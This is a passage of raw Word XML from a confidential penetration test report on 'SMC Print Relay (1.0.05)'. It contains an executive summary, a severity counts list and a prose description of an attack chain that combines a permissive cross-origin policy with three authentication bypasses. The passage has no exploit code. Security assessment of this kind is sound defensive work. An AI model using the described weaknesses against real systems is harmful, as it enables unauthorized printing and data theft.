        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079918 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15ED6430" w14:textId="7767B551"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19" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10. Over-Permissive HTTP URL ACL Reservation (Everyone) - Low</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079919 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F294B1F" w14:textId="089B3C47" w:rsidR="00183493" w:rsidRDefault="0018349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32079920" w:history="1">
        <w:r w:rsidRPr="00394A04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>11. Local Persistence and Configuration Hygiene - Info</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc232079920 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63C78A07" w14:textId="7E33BB40" w:rsidR="009C1A99" w:rsidRPr="00217429" w:rsidRDefault="009C1A99" w:rsidP="0065633A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Open Sans"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79072959" w14:textId="77777777" w:rsidR="0065633A" w:rsidRPr="00217429" w:rsidRDefault="0065633A" w:rsidP="0065633A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CA305F" w14:textId="77777777" w:rsidR="00934F78" w:rsidRPr="00217429" w:rsidRDefault="00934F78">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Open Sans"/>
          <w:b/>
          <w:caps/>
          <w:color w:val="BC161C"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE7BDC" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="0065633A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD28E79" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="67"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc232079906"/>
      <w:r>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B092D8" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="88" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="72"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE4EF9" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Inovalon Offensive Security Team, hereby known as Inovalon (OST), was engaged by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40286C84" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00C7515B" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="172"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inovalon’s leadership team to conduct a web application penetration test on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMC Print Relay (1.0.05).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This engagement was designed to provide the development </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>team</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> an insight into the potential security risks posed by using the application. The assessment was conducted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>06/10-14/26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This report contains confidential information about the state of the application’s security controls. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7D76C" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="178"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inovalon’s security team worked with the development team to define the scope of the engagement. To this end, Inovalon OST developed a hybrid methodology that combines both an objective and systematic approach designed to identify the real-world risk to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMC Print Relay (1.0.05).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> During the initial phase of the assessment, a scoping meeting was conducted in which the goals of the assessment were agreed upon by both teams. These goals included the following:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870316A" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="004B18A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="26" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify vectors that can result in the theft of customer data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324678E" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="004B18A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="36" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify vectors that can result in the escalation of user privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A58754" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="004B18A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="179" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Provide remediation instructions for any deficiencies discovered </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57458C10" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="172"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the assessment, Inovalon OST was able to successfully identify security issues that could: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B26E5" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="004B18A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="31" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable malicious users to attack and compromise other users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AFD3F2" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="176" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable malicious users to leverage misconfigured controls to harvest sensitive data of other customers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22629999" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:r>
        <w:t xml:space="preserve">Inovalon OST encourages the leadership team to look over the findings laid forth in this report and identify a viable strategy for implementing a remediation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB3C47" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="792"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33344463" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="387"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The findings and recommendations resulting from the assessment are included in the “Technical Findings Overview.” This report is intended solely for the information and use of developers and Inovalon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77306693" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:spacing w:after="387"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
        <w:t>Inovalon OST identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC02BA" w14:textId="77777777" w:rsidR="008D0E55" w:rsidRDefault="008D0E55" w:rsidP="008D0E55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SEVERITY SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11614DA6" w14:textId="77777777" w:rsidR="0070352C" w:rsidRDefault="0070352C" w:rsidP="008D0E55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEC95FF" w14:textId="77777777" w:rsidR="0070352C" w:rsidRPr="008D0E55" w:rsidRDefault="0070352C" w:rsidP="008D0E55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43366B" w14:textId="77777777" w:rsidR="003A3CBE" w:rsidRDefault="0070352C" w:rsidP="008D0E55">
      <w:pPr>
        <w:spacing w:after="387"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical:  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B9E75" w14:textId="77777777" w:rsidR="0070352C" w:rsidRDefault="0070352C" w:rsidP="0070352C">
      <w:pPr>
        <w:spacing w:after="387"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High:  4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734AC472" w14:textId="77777777" w:rsidR="003A3CBE" w:rsidRDefault="00F52F49" w:rsidP="003A3CBE">
      <w:pPr>
        <w:spacing w:after="387"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Moderate: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F305E" w14:textId="77777777" w:rsidR="0070352C" w:rsidRDefault="0070352C" w:rsidP="00C90992">
      <w:pPr>
        <w:spacing w:after="387"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF4FCD" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>THE BIGGER PICTURE: COMBINED ATTACK CHAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18355A85" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The four High-severity findings are not independent issues — they form a single end-to-end attack chain. A permissive cross-origin policy (F4) makes the loopback service reachable from any web page, turning a local-only weakness into a remote, click-driven attack. From there, the attacker needs only ONE of three independent authentication bypasses — F3 (an endpoint with no validation at all), F1 (an attacker-controlled token check), or F2 (a B2C path that trusts attacker-hosted keys) — to have a document ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>cepted for printing. Unauthenticated reconnaissance (M6) supplies the target list, and the same access enables print-routing tampering (M5) as an alternative payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096358D1" w14:textId="77777777" w:rsidR="003B725B" w:rsidRDefault="003B725B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBFBB8C" w14:textId="77777777" w:rsidR="003B725B" w:rsidRDefault="003B725B"/>
    <w:p w14:paraId="51DE5B22" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Remediation implication: because the three bypasses are an OR (any one is sufficient), fixing only one accomplishes nothing while the others remain. Closing the chain requires fixing the delivery vector (F4) AND every authentication bypass (F1, F2, F3) — ideally by routing all print endpoints through one shared, correctly-implemented authorization gate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B17BE" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="729F4615" wp14:editId="1E7C5173">
            <wp:extent cx="6126480" cy="4446639"/>
            <wp:effectExtent l="38100" t="38100" r="45720" b="304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chain.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126480" cy="4446639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AABF8B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure A — The complete attack chain. Delivery (F4) → optional recon (M6) → any one of three authentication bypasses (F3 / F1 / F2) → unauthorized printing, with routing-map tampering (M5) as an alternative payload. All relationships verified against the application binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39487CA4" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78832A6F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="5AFFD6BD" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRPr="00BA3BA8" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc232079907"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
        <w:t>Engagement Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="23DDF896" w14:textId="77777777" w:rsidR="00F52F49" w:rsidRPr="00BA3BA8" w:rsidRDefault="00F52F49" w:rsidP="00F52F49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The engagement was conducted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 06/10-14/26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The engagement’s scope included an application penetration test of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMC Print Relay (1.0.05)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159669DD" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00FD26B8" w:rsidRDefault="00F52F49" w:rsidP="00FD26B8">
      <w:pPr>
        <w:spacing w:after="17" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="72"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667EED2" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>APPLICATION URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41B639" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following URL was used for web printing only during the duration of testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF86A92" w14:textId="77777777" w:rsidR="00A60E02" w:rsidRDefault="00A60E02" w:rsidP="009C4B89">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="483"/>
          <w:tab w:val="center" w:pos="2741"/>
        </w:tabs>
        <w:spacing w:after="89" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="954E71"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181D2FEB" w14:textId="77777777" w:rsidR="00765DC1" w:rsidRPr="00FD7A0D" w:rsidRDefault="00FD7A0D" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Open Sans"/>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://foundation.smc-qual.gcp.inovalon.global/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32C40BC9" w14:textId="77777777" w:rsidR="00FD7A0D" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD7A0D" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2604E773" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USER TEST ACCOUNT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253000EB" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following test accounts were provided and used throughout the engagement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FFE8E" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00FD26B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Open Sans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3798"/>
        <w:gridCol w:w="4054"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w14:paraId="1A07BF2B" w14:textId="77777777" w:rsidTr="00A37316">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3DF5567E" w14:textId="77777777" w:rsidR="00FD26B8" w:rsidRPr="00BA3BA8" w:rsidRDefault="00FD26B8" w:rsidP="00155B36">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
